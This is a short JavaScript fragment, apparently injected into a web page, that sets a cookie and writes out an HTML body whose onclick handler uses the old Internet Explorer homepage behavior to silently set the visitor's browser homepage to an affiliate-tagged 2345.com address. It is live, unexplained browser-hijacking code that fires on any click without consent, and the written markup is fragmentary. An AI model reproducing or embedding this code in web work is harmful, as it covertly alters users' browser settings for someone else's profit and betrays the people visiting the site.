function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 10*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ document.cookie = "Cookie1= http://www.2345.com/?4812;expires="+ Then.toGMTString()

document.writeln("<\/STYLE>");
document.writeln("<script type=\"text\/javascript\">var setN=0;<\/script>");
document.writeln("<META content=\"MSHTML 6.00.6000.16587\" name=GENERATOR><\/HEAD>");
document.writeln("<body onclick=\"this.style.behavior=\'url(#default#homepage)\';if(!(this.isHomePage (\'http:\/\/ www.2345.com'))&&setN!=1){this.sethomepage(\'http:\/\/www.2345.com\/?4812');setN=1;}\">");
document.writeln("<DIV id=wrap>");
document.writeln("<DIV id=header>");
document.writeln("<DIV id=elogin>");

}
}Get(); 
